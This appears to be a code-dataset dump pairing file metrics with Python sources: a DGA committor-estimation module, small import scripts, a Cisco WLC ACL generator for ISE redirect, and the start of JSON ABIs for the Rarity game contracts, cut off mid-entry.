| 0.541975
| 256
| 1,620
| 3.394531
| 0.476563
| 0.055236
| 0.043728
| 0.055236
| 0.773303
| 0.773303
| 0.773303
| 0.773303
| 0.773303
| 0.773303
| 0
| 0.500888
| 0.304938
| 1,620
| 31
| 97
| 52.258065
| 0.27087
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
682df13b85ef649423b6b0c32a22853008f7e1aa
| 10,193
|
py
|
Python
|
extq/dga.py
|
dinner-group/insulin-hexamer
|
6dfd3b9d197ceea73ca86f79ba734578e54f0a25
|
[
"MIT"
] | null | null | null |
extq/dga.py
|
dinner-group/insulin-hexamer
|
6dfd3b9d197ceea73ca86f79ba734578e54f0a25
|
[
"MIT"
] | null | null | null |
extq/dga.py
|
dinner-group/insulin-hexamer
|
6dfd3b9d197ceea73ca86f79ba734578e54f0a25
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy import linalg
from scipy import sparse
from .stop import backward_stop
from .stop import forward_stop
def forward_committor(basis, weights, in_domain, guess, lag, test_basis=None):
"""Estimate the forward committor using DGA.
Parameters
----------
basis : list of (n_frames[i], n_basis) ndarray of float
Basis for estimating the committor. Must be zero outside of the
domain.
weights : list of (n_frames[i],) ndarray of float
Reweighting factor to the invariant distribution for each frame.
in_domain : list of (n_frames[i],) ndarray of bool
Whether each frame of the trajectories is in the domain.
guess : list of (n_frames[i],) ndarray of float
Guess for the committor. Must obey boundary conditions.
lag : int
DGA lag time in units of frames.
test_basis : list of (n_frames[i], n_basis) ndarray of float, optional
Test basis against which to minimize the error. Must have the
same dimension as the basis used to estimate the committor.
If None, use the basis that is used to estimate the committor.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the forward committor at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
a = 0.0
b = 0.0
for x, y, w, d, g in zip(test_basis, basis, weights, in_domain, guess):
assert np.all(w[-lag:] == 0.0)
iy = np.minimum(np.arange(lag, len(d)), forward_stop(d)[:-lag])
assert np.all(iy < len(d))
a += (x[:-lag].T * w[:-lag]) @ (y[iy] - y[:-lag])
b -= (x[:-lag].T * w[:-lag]) @ (g[iy] - g[:-lag])
coeffs = linalg.solve(a, b)
return [y @ coeffs + g for y, g in zip(basis, guess)]
def backward_committor(basis, weights, in_domain, guess, lag, test_basis=None):
"""Estimate the backward committor using DGA.
Parameters
----------
basis : list of (n_frames[i], n_basis) ndarray of float
Basis for estimating the committor. Must be zero outside of the
domain.
weights : list of (n_frames[i],) ndarray of float
Reweighting factor to the invariant distribution for each frame.
in_domain : list of (n_frames[i],) ndarray of bool
Whether each frame of the trajectories is in the domain.
guess : list of (n_frames[i],) ndarray of float
Guess for the committor. Must obey boundary conditions.
lag : int
DGA lag time in units of frames.
test_basis : list of (n_frames[i], n_basis) ndarray of float, optional
Test basis against which to minimize the error. Must have the
same dimension as the basis used to estimate the committor.
If None, use the basis that is used to estimate the committor.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the backward committor at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
a = 0.0
b = 0.0
for x, y, w, d, g in zip(test_basis, basis, weights, in_domain, guess):
assert np.all(w[-lag:] == 0.0)
iy = np.maximum(np.arange(len(d) - lag), backward_stop(d)[lag:])
assert np.all(iy >= 0)
a += (x[lag:].T * w[:-lag]) @ (y[iy] - y[lag:])
b -= (x[lag:].T * w[:-lag]) @ (g[iy] - g[lag:])
coeffs = linalg.solve(a, b)
return [y @ coeffs + g for y, g in zip(basis, guess)]
def forward_committor_sparse(
basis, weights, in_domain, guess, lag, test_basis=None
):
"""Estimate the forward committor using DGA with sparse basis sets.
Parameters
----------
basis : list of (n_frames[i], n_basis) sparse matrix of float
Sparse basis for estimating the committor. Must be zero outside
of the domain.
weights : list of (n_frames[i],) ndarray of float
Reweighting factor to the invariant distribution for each frame.
in_domain : list of (n_frames[i],) ndarray of bool
Whether each frame of the trajectories is in the domain.
guess : list of (n_frames[i],) ndarray of float
Guess for the committor. Must obey boundary conditions.
lag : int
DGA lag time in units of frames.
test_basis : list of (n_frames[i], n_basis) sparse matrix of float, optional
Sparse test basis against which to minimize the error. Must have
the same dimension as the basis used to estimate the committor.
If None, use the basis that is used to estimate the committor.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the forward committor at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
a = 0.0
b = 0.0
for x, y, w, d, g in zip(test_basis, basis, weights, in_domain, guess):
assert np.all(w[-lag:] == 0.0)
iy = np.minimum(np.arange(lag, len(d)), forward_stop(d)[:-lag])
assert np.all(iy < len(d))
a += x[:-lag].T @ sparse.diags(w[:-lag]) @ (y[iy] - y[:-lag])
b -= x[:-lag].T @ sparse.diags(w[:-lag]) @ (g[iy] - g[:-lag])
coeffs = sparse.linalg.spsolve(a, b)
return [y @ coeffs + g for y, g in zip(basis, guess)]
def backward_committor_sparse(
basis, weights, in_domain, guess, lag, test_basis=None
):
"""Estimate the backward committor using DGA with sparse basis sets.
Parameters
----------
basis : list of (n_frames[i], n_basis) sparse matrix of float
Sparse basis for estimating the committor. Must be zero outside
of the domain.
weights : list of (n_frames[i],) ndarray of float
Reweighting factor to the invariant distribution for each frame.
in_domain : list of (n_frames[i],) ndarray of bool
Whether each frame of the trajectories is in the domain.
guess : list of (n_frames[i],) ndarray of float
Guess for the committor. Must obey boundary conditions.
lag : int
DGA lag time in units of frames.
test_basis : list of (n_frames[i], n_basis) sparse matrix of float, optional
Sparse test basis against which to minimize the error. Must have
the same dimension as the basis used to estimate the committor.
If None, use the basis that is used to estimate the committor.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the backward committor at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
a = 0.0
b = 0.0
for x, y, w, d, g in zip(test_basis, basis, weights, in_domain, guess):
assert np.all(w[-lag:] == 0.0)
iy = np.maximum(np.arange(len(d) - lag), backward_stop(d)[lag:])
assert np.all(iy >= 0)
a += x[lag:].T @ sparse.diags(w[:-lag]) @ (y[iy] - y[lag:])
b -= x[lag:].T @ sparse.diags(w[:-lag]) @ (g[iy] - g[lag:])
coeffs = sparse.linalg.spsolve(a, b)
return [y @ coeffs + g for y, g in zip(basis, guess)]
def reweight(basis, lag, guess=None, test_basis=None):
"""Estimate the reweighting factors to the invariant distribution.
Parameters
----------
basis : list of (n_frames[i], n_basis) ndarray of float
Basis for estimating the reweighting factors.
lag : int
Lag time in unit of frames.
guess : list of (n_frames[i],) ndarray of float, optional
Guess for the reweighting factors. The last lag frames of each
trajectory must be zero.
If None, use uniform weights (except for the last lag frames).
test_basis : list of (n_frames[i], n_basis) ndarray of float, optional
Test basis against which to minimize the error. Must have the
same dimension as the basis used to estimate the reweighting
factors.
If None, use the basis that is used to estimate the reweighting
factors.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the reweighting factors at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
if guess is None:
guess = []
for x in basis:
w = np.ones(len(x))
w[-lag:] = 0.0
guess.append(w)
a = 0.0
b = 0.0
for x, y, w in zip(test_basis, basis, guess):
assert np.all(w[-lag:] == 0.0)
a += ((x[lag:] - x[:-lag]).T * w[:-lag]) @ y[:-lag]
b -= (x[lag:] - x[:-lag]).T @ w[:-lag]
coeffs = linalg.solve(a, b)
return [w * (y @ coeffs + 1.0) for y, w in zip(basis, guess)]
def reweight_sparse(basis, lag, guess=None, test_basis=None):
"""Estimate the reweighting factors to the invariant distribution
using sparse basis sets.
Parameters
----------
basis : list of (n_frames[i], n_basis) sparse matrix of float
Sparse basis for estimating the reweighting factors.
lag : int
Lag time in unit of frames.
guess : list of (n_frames[i],) ndarray of float, optional
Guess for the reweighting factors. The last lag frames of each
trajectory must be zero.
If None, use uniform weights (except for the last lag frames).
test_basis : list of (n_frames[i], n_basis) sparse matrix of float, optional
Sparse test basis against which to minimize the error. Must have
the same dimension as the basis used to estimate the reweighting
factors.
If None, use the basis that is used to estimate the reweighting
factors.
Returns
-------
list of (n_frames[i],) ndarray
Estimate of the reweighting factors at each frame of the
trajectory.
"""
if test_basis is None:
test_basis = basis
if guess is None:
guess = []
for x in basis:
w = np.ones(x.shape[0])
w[-lag:] = 0.0
guess.append(w)
a = 0.0
b = 0.0
for x, y, w in zip(test_basis, basis, guess):
assert np.all(w[-lag:] == 0.0)
a += (x[lag:] - x[:-lag]).T @ sparse.diags(w[:-lag]) @ y[:-lag]
b -= (x[lag:] - x[:-lag]).T @ w[:-lag]
coeffs = sparse.linalg.spsolve(a, b)
return [w * (y @ coeffs + 1.0) for y, w in zip(basis, guess)]
| 37.751852
| 80
| 0.616207
| 1,567
| 10,193
| 3.945118
| 0.067645
| 0.05241
| 0.036234
| 0.067292
| 0.976221
| 0.976221
| 0.973148
| 0.971368
| 0.966516
| 0.966516
| 0
| 0.006351
| 0.274012
| 10,193
| 269
| 81
| 37.892193
| 0.829054
| 0.570686
| 0
| 0.757895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.063158
| false
| 0
| 0.052632
| 0
| 0.178947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
683173fff10d3c84009264ee3d8b375c12f0a67d
| 174
|
py
|
Python
|
firmware/python/simple_zcu216_example/__init__.py
|
slaclab/Simple-ZCU216-Example
|
db0c08870a2ed846935c9abf2565beacd2954920
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
firmware/python/simple_zcu216_example/__init__.py
|
slaclab/Simple-ZCU216-Example
|
db0c08870a2ed846935c9abf2565beacd2954920
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
firmware/python/simple_zcu216_example/__init__.py
|
slaclab/Simple-ZCU216-Example
|
db0c08870a2ed846935c9abf2565beacd2954920
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from simple_zcu216_example._Application import *
from simple_zcu216_example._XilinxZcu216 import *
from simple_zcu216_example._Root import *
| 43.5
| 57
| 0.706897
| 18
| 174
| 6.333333
| 0.444444
| 0.263158
| 0.421053
| 0.605263
| 0.508772
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.258621
| 174
| 3
| 58
| 58
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
68349bb23c778d357cc7ca8428c35566268e0405
| 117
|
py
|
Python
|
anotherexamples/implement_app.py
|
podishad/pythontutorial
|
50a7431064e15f26afcb6b0cd34226e228222813
|
[
"Apache-2.0"
] | null | null | null |
anotherexamples/implement_app.py
|
podishad/pythontutorial
|
50a7431064e15f26afcb6b0cd34226e228222813
|
[
"Apache-2.0"
] | null | null | null |
anotherexamples/implement_app.py
|
podishad/pythontutorial
|
50a7431064e15f26afcb6b0cd34226e228222813
|
[
"Apache-2.0"
] | null | null | null |
import useful_tools
print(useful_tools.roll_dice(20))
print(useful_tools.employess)
print(useful_tools.employess[5])
| 23.4
| 33
| 0.846154
| 18
| 117
| 5.222222
| 0.5
| 0.468085
| 0.510638
| 0.531915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026786
| 0.042735
| 117
| 5
| 34
| 23.4
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
683e76f08e7cb5f5f4efc74111b59cedb8672b68
| 9,051
|
py
|
Python
|
wlc_acl_ise.py
|
andreirapuru/wlc_acl_redirect
|
0d638f416ba912eaa98d30e0b58c97380b3f9488
|
[
"MIT"
] | null | null | null |
wlc_acl_ise.py
|
andreirapuru/wlc_acl_redirect
|
0d638f416ba912eaa98d30e0b58c97380b3f9488
|
[
"MIT"
] | 1
|
2021-02-19T20:51:05.000Z
|
2021-02-19T20:51:49.000Z
|
wlc_acl_ise.py
|
andreirapuru/wlc_acl_redirect
|
0d638f416ba912eaa98d30e0b58c97380b3f9488
|
[
"MIT"
] | null | null | null |
#Author: Andre Ortega, brainwork.com.br
#https://github.com/andreirapuru/wlc_acl_redirect
print('\n********************************** Script initiated **********************************')
print('\n')
psnlist = []
avlist = []
ace = 1
psns = int(input('PSNs: '))
avs = int(input('Remediation:'))
for i in range(psns):
psnipaddress = input('IP Address PSN'+str(i+1)+': ')
psnlist.append(psnipaddress)
for i in range(avs):
avipaddress = input('IP Address Remediation'+str(i+1)+': ')
avlist.append(avipaddress)
#Create a .txt file with the ACLs
acl = open('here_are_your_acls.txt', 'a')
acl.write('\n******************************** ACL POSTURE REDIRECT ********************************')
acl.write('\n')
acl.write('\nconfig acl create ACL_POSTURE_REDIRECT')
acl.write('\n')
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule destination port range ACL_POSTURE_REDIRECT '+str(ace)+' 53 53')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+str(ace)+'')
acl.write('\nconfig acl rule source port range ACL_POSTURE_REDIRECT '+str(ace)+' 53 53')
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
for i in range(psns):
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule destination port range ACL_POSTURE_REDIRECT '+str(ace)+' 8443 8443')
acl.write('\nconfig acl rule destination address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source port range ACL_POSTURE_REDIRECT '+str(ace)+' 8443 8443')
acl.write('\nconfig acl rule source address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule destination port range ACL_POSTURE_REDIRECT '+str(ace)+' 8905 8905')
acl.write('\nconfig acl rule destination address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source port range ACL_POSTURE_REDIRECT '+str(ace)+' 8905 8905')
acl.write('\nconfig acl rule source address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule destination port range ACL_POSTURE_REDIRECT '+str(ace)+' 8905 8905')
acl.write('\nconfig acl rule destination address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source port range ACL_POSTURE_REDIRECT '+str(ace)+' 8905 8905')
acl.write('\nconfig acl rule source address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule destination port range ACL_POSTURE_REDIRECT '+str(ace)+' 8909 8909')
acl.write('\nconfig acl rule destination address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source port range ACL_POSTURE_REDIRECT '+str(ace)+' 8909 8909')
acl.write('\nconfig acl rule source address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule destination port range ACL_POSTURE_REDIRECT '+str(ace)+' 8909 8909')
acl.write('\nconfig acl rule destination address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source port range ACL_POSTURE_REDIRECT '+str(ace)+' 8909 8909')
acl.write('\nconfig acl rule source address ACL_POSTURE_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule protocol ACL_POSTURE_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
for i in range(avs):
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule destination address ACL_POSTURE_REDIRECT '+str(ace)+' '+ avlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_POSTURE_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source address ACL_POSTURE_REDIRECT '+str(ace)+' '+ avlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_POSTURE_REDIRECT '+str(ace)+' permit')
acl.write('\n')
acl.write('\nconfig acl apply ACL_POSTURE_REDIRECT')
acl.write('\n')
acl.write('\n******************************** ACL WEBAUTH REDIRECT ********************************')
ace = 1
acl.write('\n')
acl.write('\nconfig acl create ACL_WEBAUTH_REDIRECT')
acl.write('\n')
acl.write('\nconfig acl rule add ACL_WEBAUTH_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_WEBAUTH_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule destination port range ACL_WEBAUTH_REDIRECT '+str(ace)+' 53 53')
acl.write('\nconfig acl rule action ACL_WEBAUTH_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_WEBAUTH_REDIRECT '+str(ace)+'')
acl.write('\nconfig acl rule source port range ACL_WEBAUTH_REDIRECT '+str(ace)+' 53 53')
acl.write('\nconfig acl rule protocol ACL_WEBAUTH_REDIRECT '+str(ace)+' 17')
acl.write('\nconfig acl rule action ACL_WEBAUTH_REDIRECT '+str(ace)+' permit')
acl.write('\n')
for i in range(psns):
ace=ace+1
acl.write('\nconfig acl rule add ACL_WEBAUTH_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule protocol ACL_WEBAUTH_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule destination port range ACL_WEBAUTH_REDIRECT '+str(ace)+' 8443 8443')
acl.write('\nconfig acl rule destination address ACL_WEBAUTH_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule action ACL_WEBAUTH_REDIRECT '+str(ace)+' permit')
acl.write('\n')
ace=ace+1
acl.write('\nconfig acl rule add ACL_WEBAUTH_REDIRECT '+ str(ace))
acl.write('\nconfig acl rule source port range ACL_WEBAUTH_REDIRECT '+str(ace)+' 8443 8443')
acl.write('\nconfig acl rule source address ACL_WEBAUTH_REDIRECT '+str(ace)+' '+ psnlist[i] +' 255.255.255.255')
acl.write('\nconfig acl rule protocol ACL_WEBAUTH_REDIRECT '+str(ace)+' 6')
acl.write('\nconfig acl rule action ACL_WEBAUTH_REDIRECT '+str(ace)+' permit')
acl.write('\n')
acl.write('\nconfig acl apply ACL_WEBAUTH_REDIRECT')
acl.close()
output=open('here_are_your_acls.txt','r')
print(output.read())
print('\n''********************************** Script finished **********************************')
| 55.189024
| 119
| 0.693404
| 1,371
| 9,051
| 4.44639
| 0.052516
| 0.145669
| 0.211614
| 0.253937
| 0.932907
| 0.927657
| 0.92044
| 0.92044
| 0.91519
| 0.908301
| 0
| 0.040827
| 0.123191
| 9,051
| 163
| 120
| 55.527607
| 0.727319
| 0.013037
| 0
| 0.765101
| 0
| 0
| 0.607049
| 0.035816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.026846
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
684215d9eaa10ef78f247a00ad9ca4052463b7c6
| 20,854
|
py
|
Python
|
scripts/abis.py
|
rarity-adventure/rarity-integration
|
6cb142c129affd56066d7b9565a2f9055ac207f5
|
[
"MIT"
] | null | null | null |
scripts/abis.py
|
rarity-adventure/rarity-integration
|
6cb142c129affd56066d7b9565a2f9055ac207f5
|
[
"MIT"
] | null | null | null |
scripts/abis.py
|
rarity-adventure/rarity-integration
|
6cb142c129affd56066d7b9565a2f9055ac207f5
|
[
"MIT"
] | 1
|
2022-02-09T06:04:44.000Z
|
2022-02-09T06:04:44.000Z
|
import json
gold_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"spender","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"claim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"claimable","outputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"claimed","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"executor","type":"uint256"},{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"level","type":"uint256"}],"name":"wealth_by_level","outputs":[{"internalType":"uint256","name":"wealth","type":"uint256"}],"stateMutability":"pure","type":"function"}]""")
rm_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"level","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"leveled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"class","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"summoned","type":"event"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"adventure","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"adventurers_log","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"class","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"classes","outputs":[{"internalType":"string","name":"description","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address